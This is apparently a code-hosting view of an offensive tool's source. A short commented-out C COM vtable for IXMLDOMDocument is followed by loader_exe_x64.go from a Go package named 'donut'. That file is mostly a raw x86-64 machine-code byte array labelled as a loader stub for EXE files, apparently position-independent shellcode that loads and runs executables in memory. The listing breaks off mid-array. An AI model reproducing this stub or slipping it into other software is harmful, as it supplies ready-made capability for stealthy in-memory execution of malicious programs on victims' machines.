424 IXMLDOMDocument * This,
425 BSTR *prefixString);
426
427 HRESULT ( STDMETHODCALLTYPE *get_baseName )(
428 IXMLDOMDocument * This,
429 BSTR *nameString);
430
431 HRESULT ( STDMETHODCALLTYPE *transformNodeToObject )(
432 IXMLDOMDocument * This,
433 IXMLDOMNode *stylesheet,
434 VARIANT outputObject);
435
436 HRESULT ( STDMETHODCALLTYPE *get_doctype )(
437 IXMLDOMDocument * This,
438 IXMLDOMDocumentType **documentType);
439
440 HRESULT ( STDMETHODCALLTYPE *get_implementation )(
441 IXMLDOMDocument * This,
442 IXMLDOMImplementation **impl);
443
444 HRESULT ( STDMETHODCALLTYPE *get_documentElement )(
445 IXMLDOMDocument * This,
446 IXMLDOMElement **DOMElement);
447
448 HRESULT ( STDMETHODCALLTYPE *putref_documentElement )(
449 IXMLDOMDocument * This,
450 IXMLDOMElement *DOMElement);
451
452 HRESULT ( STDMETHODCALLTYPE *createElement )(
453 IXMLDOMDocument * This,
454 BSTR tagName,
455 IXMLDOMElement **element);
456
457 HRESULT ( STDMETHODCALLTYPE *createDocumentFragment )(
458 IXMLDOMDocument * This,
459 IXMLDOMDocumentFragment **docFrag);
460
461 HRESULT ( STDMETHODCALLTYPE *createTextNode )(
462 IXMLDOMDocument * This,
463 BSTR data,
464 IXMLDOMText **text);
465
466 HRESULT ( STDMETHODCALLTYPE *createComment )(
467 IXMLDOMDocument * This,
468 BSTR data,
469 IXMLDOMComment **comment);
470
471 HRESULT ( STDMETHODCALLTYPE *createCDATASection )(
472 IXMLDOMDocument * This,
473 BSTR data,
474 IXMLDOMCDATASection **cdata);
475
476 HRESULT ( STDMETHODCALLTYPE *createProcessingInstruction )(
477 IXMLDOMDocument * This,
478 BSTR target,
479 BSTR data,
480 IXMLDOMProcessingInstruction **pi);
481
482 HRESULT ( STDMETHODCALLTYPE *createAttribute )(
483 IXMLDOMDocument * This,
484 BSTR name,
485 IXMLDOMAttribute **attribute);
486
487 HRESULT ( STDMETHODCALLTYPE *createEntityReference )(
488 IXMLDOMDocument * This,
489 BSTR name,
490 IXMLDOMEntityReference **entityRef);
491
492 HRESULT ( STDMETHODCALLTYPE *getElementsByTagName )(
493 IXMLDOMDocument * This,
494 BSTR tagName,
495 IXMLDOMNodeList **resultList);
496
497 HRESULT ( STDMETHODCALLTYPE *createNode )(
498 IXMLDOMDocument * This,
499 VARIANT Type,
500 BSTR name,
501 BSTR namespaceURI,
502 IXMLDOMNode **node);
503
504 HRESULT ( STDMETHODCALLTYPE *nodeFromID )(
505 IXMLDOMDocument * This,
506 BSTR idString,
507 IXMLDOMNode **node);
508
509 HRESULT ( STDMETHODCALLTYPE *load )(
510 IXMLDOMDocument * This,
511 VARIANT xmlSource,
512 VARIANT_BOOL *isSuccessful);
513
514 HRESULT ( STDMETHODCALLTYPE *get_readyState )(
515 IXMLDOMDocument * This,
516 long *value);
517
518 HRESULT ( STDMETHODCALLTYPE *get_parseError )(
519 IXMLDOMDocument * This,
520 IXMLDOMParseError **errorObj);
521
522 HRESULT ( STDMETHODCALLTYPE *get_url )(
523 IXMLDOMDocument * This,
524 BSTR *urlString);
525
526 HRESULT ( STDMETHODCALLTYPE *get_async )(
527 IXMLDOMDocument * This,
528 VARIANT_BOOL *isAsync);
529
530 HRESULT ( STDMETHODCALLTYPE *put_async )(
531 IXMLDOMDocument * This,
532 VARIANT_BOOL isAsync);
533
534 HRESULT ( STDMETHODCALLTYPE *abort )(
535 IXMLDOMDocument * This);
536
537 HRESULT ( STDMETHODCALLTYPE *loadXML )(
538 IXMLDOMDocument * This,
539 BSTR bstrXML,
540 VARIANT_BOOL *isSuccessful);
541
542 HRESULT ( STDMETHODCALLTYPE *save )(
543 IXMLDOMDocument * This,
544 VARIANT destination);
545
546 HRESULT ( STDMETHODCALLTYPE *get_validateOnParse )(
547 IXMLDOMDocument * This,
548 VARIANT_BOOL *isValidating);
549
550 HRESULT ( STDMETHODCALLTYPE *put_validateOnParse )(
551 IXMLDOMDocument * This,
552 VARIANT_BOOL isValidating);
553
554 HRESULT ( STDMETHODCALLTYPE *get_resolveExternals )(
555 IXMLDOMDocument * This,
556 VARIANT_BOOL *isResolving);
557
558 HRESULT ( STDMETHODCALLTYPE *put_resolveExternals )(
559 IXMLDOMDocument * This,
560 VARIANT_BOOL isResolving);
561
562 HRESULT ( STDMETHODCALLTYPE *get_preserveWhiteSpace )(
563 IXMLDOMDocument * This,
564 VARIANT_BOOL *isPreserving);
565
566 HRESULT ( STDMETHODCALLTYPE *put_preserveWhiteSpace )(
567 IXMLDOMDocument * This,
568 VARIANT_BOOL isPreserving);
569
570 HRESULT ( STDMETHODCALLTYPE *put_onreadystatechange )(
571 IXMLDOMDocument * This,
572 VARIANT readystatechangeSink);
573
574 HRESULT ( STDMETHODCALLTYPE *put_ondataavailable )(
575 IXMLDOMDocument * This,
576 VARIANT ondataavailableSink);
577
578 HRESULT ( STDMETHODCALLTYPE *put_ontransformnode )(
579 IXMLDOMDocument * This,
580 VARIANT ontransformnodeSink);
581
582 END_INTERFACE
583 } IXMLDOMDocumentVtbl;
584
585 typedef struct _IXMLDOMDocument {
586 IXMLDOMDocumentVtbl *lpVtbl;
587 } XMLDomDocument;*/
+2460
-0
loader_exe_x64.go less more
0 package donut
1
2 // LOADER_EXE_X64 - stub for EXE PE files
3 var LOADER_EXE_X64 = []byte{
4
5 0x55, 0x48, 0x81, 0xec, 0x30, 0x05, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24,
6 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x8d, 0xc0, 0x04, 0x00, 0x00, 0x48,
7 0xc7, 0x85, 0xa8, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
8 0x85, 0xc0, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x08, 0x02, 0x00, 0x00,
9 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x51, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
10 0xc0, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x70, 0x48, 0x89, 0x85, 0xa0,
11 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00, 0x00, 0x48, 0x8b,
12 0x50, 0x28, 0x48, 0x8b, 0x85, 0xa0, 0x04, 0x00, 0x00, 0x49, 0x89, 0xd0,
13 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xc0, 0x04, 0x00, 0x00, 0xe8, 0x21,
14 0x15, 0x00, 0x00, 0x48, 0x89, 0x85, 0x98, 0x04, 0x00, 0x00, 0x48, 0x83,
15 0xbd, 0x98, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x89, 0x00, 0x00, 0x00,
16 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
17 0x20, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x04, 0x00, 0x00,
18 0x4c, 0x8b, 0x8d, 0xc0, 0x04, 0x00, 0x00, 0x4c, 0x8d, 0x05, 0xfc, 0x00,
19 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00,
20 0xff, 0xd0, 0x48, 0x89, 0x85, 0xa8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85,
21 0xc0, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48,
22 0x89, 0x85, 0xa0, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00,
23 0x00, 0x48, 0x8b, 0x50, 0x28, 0x48, 0x8b, 0x85, 0xa0, 0x04, 0x00, 0x00,
24 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xc0, 0x04, 0x00,
25 0x00, 0xe8, 0x9a, 0x14, 0x00, 0x00, 0x48, 0x89, 0x85, 0x90, 0x04, 0x00,
26 0x00, 0x48, 0x83, 0xbd, 0x88, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x8b,
27 0x00, 0x00, 0x00, 0xeb, 0x0c, 0x48, 0xc7, 0xc0, 0xff, 0xff, 0xff, 0xff,
28 0xe9, 0x84, 0x00, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x80, 0x04, 0x00, 0x00,
29 0x00, 0x74, 0x73, 0x48, 0x83, 0xbd, 0x90, 0x04, 0x00, 0x00, 0x00, 0x74,
30 0x69, 0xc7, 0x45, 0xe0, 0x0b, 0x00, 0x10, 0x00, 0x48, 0x8b, 0x85, 0x90,
31 0x04, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc1, 0x48, 0x8d, 0x45, 0xb0,
32 0x4c, 0x8b, 0x85, 0x80, 0x04, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x41, 0xff,
33 0xd0, 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x08,
34 0x02, 0x00, 0x00, 0x48, 0x89, 0x85, 0xa8, 0x00, 0x00, 0x00, 0x48, 0x8b,
35 0x45, 0x48, 0x48, 0x83, 0xe0, 0xf0, 0x48, 0x89, 0x45, 0x48, 0x48, 0x8d,
36 0x45, 0xb0, 0x4c, 0x8b, 0x85, 0x88, 0x04, 0x00, 0x00, 0xba, 0x00, 0x00,
37 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0xeb, 0x0c, 0x48, 0x8b,
38 0x8d, 0xc0, 0x04, 0x00, 0x00, 0xe8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x8b,
39 0x85, 0xa8, 0x04, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x30, 0x05, 0x00, 0x00,
40 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8d,
41 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x8d, 0xa0, 0x01, 0x00,
42 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x48,
43 0x48, 0x89, 0x85, 0x68, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01,
44 0x00, 0x00, 0x48, 0x8b, 0x50, 0x28, 0x48, 0x8b, 0x85, 0x68, 0x01, 0x00,
45 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0, 0x01,
46 0x00, 0x00, 0xe8, 0x9d, 0x13, 0x00, 0x00, 0x48, 0x89, 0x85, 0x60, 0x01,
47 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40,
48 0x50, 0x48, 0x89, 0x85, 0x68, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0,
49 0x01, 0x00, 0x00, 0x48, 0x8b, 0x50, 0x28, 0x48, 0x8b, 0x85, 0x68, 0x01,
50 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0,
51 0x01, 0x00, 0x00, 0xe8, 0x60, 0x13, 0x00, 0x00, 0x48, 0x89, 0x85, 0x58,
52 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b,
53 0x80, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85, 0x68, 0x01, 0x00, 0x00,
54 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x50, 0x28, 0x48,
55 0x8b, 0x85, 0x68, 0x01, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2,
56 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0xe8, 0x20, 0x13, 0x00, 0x00,
57 0x48, 0x89, 0x85, 0x50, 0x01, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x60, 0x01,
58 0x00, 0x00, 0x00, 0x74, 0x14, 0x48, 0x83, 0xbd, 0x58, 0x01, 0x00, 0x00,
59 0x00, 0x74, 0x0a, 0x48, 0x83, 0xbd, 0x50, 0x01, 0x00, 0x00, 0x00, 0x75,
60 0x0a, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0xa1, 0x08, 0x00, 0x00, 0x48,
61 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b,
62 0x85, 0x60, 0x01, 0x00, 0x00, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41,
63 0xb8, 0x00, 0x30, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0,
64 0x48, 0x89, 0x85, 0x48, 0x01, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x48, 0x01,
65 0x00, 0x00, 0x00, 0x75, 0x2a, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00,
66 0x8b, 0x80, 0x00, 0x02, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x75, 0x0e, 0x48,
67 0x8b, 0x85, 0x50, 0x01, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff,
68 0xd0, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0x41, 0x08, 0x00, 0x00, 0x48,
69 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x10, 0x48, 0x8b, 0x85, 0x48,
70 0x01, 0x00, 0x00, 0x41, 0x89, 0xd0, 0x48, 0x8b, 0x95, 0xa0, 0x01, 0x00,
71 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xb3, 0x61, 0x00, 0x00, 0x48, 0x8b, 0x85,
72 0x48, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48,
73 0x8d, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00,
74 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x47, 0x61, 0x00,
75 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80, 0x04, 0x02,
76 0x00, 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x85, 0x92, 0x00, 0x00, 0x00, 0x48,
77 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x05, 0x10, 0x02, 0x00, 0x00,
78 0x48, 0x89, 0x85, 0x40, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01,
79 0x00, 0x00, 0x8b, 0x00, 0x44, 0x8d, 0x80, 0xf0, 0xfd, 0xff, 0xff, 0x48,
80 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x50, 0x14, 0x48, 0x8b,
81 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x04, 0x48, 0x8b, 0x8d,
82 0x40, 0x01, 0x00, 0x00, 0x45, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89,
83 0xc1, 0xe8, 0x2e, 0x6e, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00,
84 0x00, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x95, 0xa0, 0x01, 0x00, 0x00,
85 0x48, 0x8d, 0x8a, 0x00, 0x0c, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xee,
86 0x6a, 0x00, 0x00, 0x48, 0x89, 0x85, 0x38, 0x01, 0x00, 0x00, 0x48, 0x8b,
87 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x00, 0x0d, 0x00, 0x00,
88 0x48, 0x39, 0x85, 0x38, 0x01, 0x00, 0x00, 0x0f, 0x85, 0xe6, 0x05, 0x00,
89 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x50, 0x28,
90 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x49,
91 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00,
92 0xe8, 0x77, 0x11, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xa0, 0x01, 0x00, 0x00,
93 0x48, 0x89, 0x42, 0x30, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48,
94 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff,
95 0xff, 0xe9, 0x02, 0x07, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00,
96 0x00, 0x48, 0x05, 0x14, 0x02, 0x00, 0x00, 0x48, 0x89, 0x85, 0x78, 0x01,
97 0x00, 0x00, 0xc7, 0x85, 0x8c, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
98 0xeb, 0x24, 0x8b, 0x95, 0x8c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78,
99 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x85, 0x8c,
100 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0xd0, 0x83, 0x85, 0x8c, 0x01, 0x00,
101 0x00, 0x01, 0x8b, 0x95, 0x8c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78,
102 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74,
103 0x23, 0x8b, 0x95, 0x8c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78, 0x01,
104 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x3b, 0x74, 0x0c,
105 0x81, 0xbd, 0x8c, 0x01, 0x00, 0x00, 0x03, 0x01, 0x00, 0x00, 0x76, 0xa2,
106 0x83, 0xbd, 0x8c, 0x01, 0x00, 0x00, 0x00, 0x74, 0x35, 0x8b, 0x85, 0x8c,
107 0x01, 0x00, 0x00, 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x01, 0x85, 0x78,
108 0x01, 0x00, 0x00, 0x8b, 0x85, 0x8c, 0x01, 0x00, 0x00, 0xc6, 0x44, 0x05,
109 0xd0, 0x00, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d,
110 0xa0, 0x01, 0x00, 0x00, 0xe8, 0xa5, 0x0a, 0x00, 0x00, 0xe9, 0x58, 0xff,
111 0xff, 0xff, 0x90, 0xc7, 0x85, 0x8c, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00,
112 0x00, 0xe9, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00,
113 0x00, 0x48, 0x8b, 0x48, 0x28, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00,
114 0x8b, 0x95, 0x8c, 0x01, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x06, 0x48, 0x8b,
115 0x04, 0xd0, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0,
116 0x01, 0x00, 0x00, 0xe8, 0x54, 0x10, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xa0,
117 0x01, 0x00, 0x00, 0x8b, 0x8d, 0x8c, 0x01, 0x00, 0x00, 0x48, 0x83, 0xc1,
118 0x06, 0x48, 0x89, 0x04, 0xca, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00,
119 0x8b, 0x95, 0x8c, 0x01, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x06, 0x48, 0x8b,
120 0x04, 0xd0, 0x48, 0x85, 0xc0, 0x75, 0x38, 0x48, 0x8b, 0x85, 0xa0, 0x01,
121 0x00, 0x00, 0x48, 0x8b, 0x80, 0x78, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85,
122 0x68, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b,
123 0x95, 0x8c, 0x01, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x06, 0x48, 0x8b, 0x04,
124 0xd0, 0x48, 0x39, 0x85, 0x68, 0x01, 0x00, 0x00, 0x0f, 0x85, 0x38, 0x04,
125 0x00, 0x00, 0x90, 0x83, 0x85, 0x8c, 0x01, 0x00, 0x00, 0x01, 0x48, 0x8b,
126 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80, 0x10, 0x02, 0x00, 0x00, 0x39,
127 0x85, 0x8c, 0x01, 0x00, 0x00, 0x0f, 0x82, 0x47, 0xff, 0xff, 0xff, 0x48,
128 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf4, 0x08, 0x00, 0x00,
129 0x83, 0xf8, 0x02, 0x75, 0x2b, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00,
130 0xe8, 0x52, 0x10, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xf4, 0x03, 0x00,
131 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x30,
132 0x0d, 0x00, 0x00, 0x48, 0x89, 0x85, 0x80, 0x01, 0x00, 0x00, 0xeb, 0x3c,
133 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf4, 0x08, 0x00,
134 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x84, 0xca, 0x03, 0x00, 0x00, 0x48, 0x8b,
135 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf4, 0x08, 0x00, 0x00, 0x83,
136 0xf8, 0x01, 0x75, 0x14, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48,
137 0x05, 0x30, 0x0d, 0x00, 0x00, 0x48, 0x89, 0x85, 0x80, 0x01, 0x00, 0x00,
138 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x41, 0xb9, 0x04, 0x00, 0x00,
139 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00, 0xba, 0xa4, 0x0f, 0x00, 0x00,
140 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x70, 0x01,
141 0x00, 0x00, 0x48, 0x8b, 0x95, 0x70, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
142 0xa0, 0x01, 0x00, 0x00, 0x48, 0x89, 0x90, 0xf8, 0x01, 0x00, 0x00, 0x48,
143 0x83, 0xbd, 0x70, 0x01, 0x00, 0x00, 0x00, 0x75, 0x2a, 0x48, 0x8b, 0x85,
144 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80, 0x00, 0x02, 0x00, 0x00, 0x83, 0xf8,
145 0x02, 0x75, 0x0e, 0x48, 0x8b, 0x85, 0x50, 0x01, 0x00, 0x00, 0xb9, 0x00,
146 0x00, 0x00, 0x00, 0xff, 0xd0, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0x95,
147 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80,
148 0x44, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x0f, 0x84, 0x93, 0x00, 0x00,
149 0x00, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0xe8, 0xc4, 0x56, 0x00,
150 0x00, 0x89, 0x85, 0x34, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x34, 0x01, 0x00,
151 0x00, 0x00, 0x75, 0x16, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b,
152 0x80, 0x44, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x84, 0xf1, 0x02,
153 0x00, 0x00, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0xe8, 0xdd, 0x58,
154 0x00, 0x00, 0x89, 0x85, 0x34, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x34, 0x01,
155 0x00, 0x00, 0x00, 0x75, 0x16, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00,
156 0x8b, 0x80, 0x44, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x84, 0xc3,
157 0x02, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0xe8, 0xbb,
158 0x58, 0x00, 0x00, 0x89, 0x85, 0x34, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x34,
159 0x01, 0x00, 0x00, 0x00, 0x75, 0x16, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00,
160 0x00, 0x8b, 0x80, 0x44, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x84,
161 0x95, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x8b,
162 0x40, 0x08, 0x83, 0xf8, 0x01, 0x0f, 0x84, 0x8d, 0x01, 0x00, 0x00, 0x48,
163 0xc7, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
164 0x85, 0x80, 0x01, 0x00, 0x00, 0x8b, 0x80, 0x24, 0x05, 0x00, 0x00, 0x89,
165 0xc0, 0x48, 0x05, 0x2f, 0x15, 0x00, 0x00, 0x48, 0x25, 0x00, 0xf0, 0xff,
166 0xff, 0x48, 0x89, 0x45, 0xc8, 0x48, 0x8d, 0x4d, 0xc8, 0x48, 0x8d, 0x85,
167 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x70, 0x01, 0x00, 0x00, 0x48,
168 0x89, 0x54, 0x24, 0x30, 0xc7, 0x44, 0x24, 0x28, 0x04, 0x00, 0x00, 0x00,
169 0xc7, 0x44, 0x24, 0x20, 0x00, 0x30, 0x00, 0x00, 0x49, 0x89, 0xc9, 0x41,
170 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff,
171 0xff, 0xff, 0xff, 0xe8, 0x1b, 0x65, 0x00, 0x00, 0x89, 0x85, 0x30, 0x01,
172 0x00, 0x00, 0x83, 0xbd, 0x30, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x88, 0x09,
173 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b,
174 0x95, 0x80, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x30, 0x05, 0x00, 0x00, 0x48,
175 0x89, 0xc1, 0xe8, 0xd5, 0x5c, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01,
176 0x00, 0x00, 0x8b, 0x40, 0x08, 0x83, 0xf8, 0x03, 0x74, 0x13, 0x48, 0x8b,
177 0x85, 0x80, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x08, 0x83, 0xf8, 0x04, 0x0f,
178 0x85, 0x93, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00,
179 0x4c, 0x8b, 0x90, 0xd8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01,
180 0x00, 0x00, 0x8b, 0x88, 0x20, 0x05, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80,
181 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x88, 0x28, 0x05, 0x00, 0x00, 0x48, 0x8b,
182 0x85, 0x80, 0x01, 0x00, 0x00, 0x44, 0x8b, 0x98, 0x24, 0x05, 0x00, 0x00,
183 0x48, 0x8b, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x90, 0x28, 0x05,
184 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x08,
185 0x83, 0xe8, 0x01, 0x80, 0xcc, 0x01, 0x0f, 0xb7, 0xc0, 0x4c, 0x8d, 0x85,
186 0x24, 0x01, 0x00, 0x00, 0x4c, 0x89, 0x44, 0x24, 0x28, 0x89, 0x4c, 0x24,
187 0x20, 0x45, 0x89, 0xd8, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85, 0x2c,
188 0x01, 0x00, 0x00, 0x83, 0xbd, 0x2c, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x85,
189 0x4b, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48,
190 0x89, 0x85, 0x80, 0x01, 0x00, 0x00, 0xeb, 0x40, 0x48, 0x8b, 0x85, 0x80,
191 0x01, 0x00, 0x00, 0x8b, 0x40, 0x08, 0x83, 0xf8, 0x02, 0x75, 0x31, 0x48,
192 0x8b, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x90, 0x28, 0x05, 0x00,
193 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x05, 0x28, 0x05,
